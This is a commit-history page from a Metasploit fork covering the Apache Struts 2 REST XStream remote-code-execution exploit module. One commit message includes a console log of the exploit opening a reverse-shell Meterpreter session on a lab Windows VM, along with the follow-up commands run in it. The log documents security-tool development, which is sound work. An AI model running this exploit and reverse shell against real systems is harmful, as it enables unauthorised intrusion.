adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
59,500 Commits 27 Branches 1,043 Tags
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
Commit Graph

14 Commits

Author SHA1 Message Date
William Vu c917ec70d1 Fix missing split in struts2_rest_xstream 2019-07-10 11:15:36 -05:00
William Vu e6300bfd63 Fix cmd_psh_payload requiring an arch string 
We may want to update Rex::Powershell to take the first in an array.
 2019-07-09 17:43:23 -05:00
William Vu 0328814241 Indent ternary statement in struts2_rest_xstream 2019-05-20 12:35:52 -05:00
William Vu 53bf15b184 Fix exploit/multi/http/struts2_rest_xstream 2019-02-25 11:18:27 -06:00
William Vu 90b9204703 Update DisclosureDate to ISO 8601 in my modules 
Basic msftidy fixer:

diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb
index 9a21b9e398..e9ff2b21e5 100755
--- a/tools/dev/msftidy.rb
+++ b/tools/dev/msftidy.rb
@@ -442,6 +442,8 @@ class Msftidy
     # Check disclosure date format
     if @source =~ /["']DisclosureDate["'].*\=\>[\x0d\x20]*['\"](.+?)['\"]/
       d = $1  #Captured date
+      File.write(@full_filepath, @source.sub(d, Date.parse(d).to_s))
+      fixed('Probably updated traditional DisclosureDate to ISO 8601')
       # Flag if overall format is wrong
       if d =~ /^... (?:\d{1,2},? )?\d{4}$/
         # Flag if month format is wrong
 2018-11-16 12:18:28 -06:00
William Vu 7c7f63df45 Fix missing normalize_uri in struts2_rest_xstream 
I missed this one previously. May not be necessary but nice to have.
 2018-08-30 15:56:43 -05:00
William Vu f6b868bac2 Prefer regex for target check in exploit method 
This is how I initially wrote it out, and I think I like it better.
Obviously we'll still check individual symbols in execute_command, since
some of the matching is disjoint.
 2018-08-28 15:56:45 -05:00
William Vu 3dec79da23 Add Windows ARCH_CMD target and refactor again 
Must have been an oversight that I didn't add the target.
 2018-08-28 15:03:41 -05:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
 2018-08-27 20:01:00 -05:00
Brent Cook 54a62976f8 update versions and add quick module docs 2017-09-08 13:59:29 -05:00
William Vu 978fdb07b0 Comment out PSH target and explain why 
I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
 2017-09-08 13:41:06 -05:00
William Vu a9a307540f Assign cmd to entire case and use encode for XML 
Hat tip @acammack-r7. Forgot about that first syntax!
 2017-09-07 19:36:08 -05:00
William Vu 8f1e353b6e Add Apache Struts 2 REST Plugin XStream RCE 2017-09-07 19:30:48 -05:00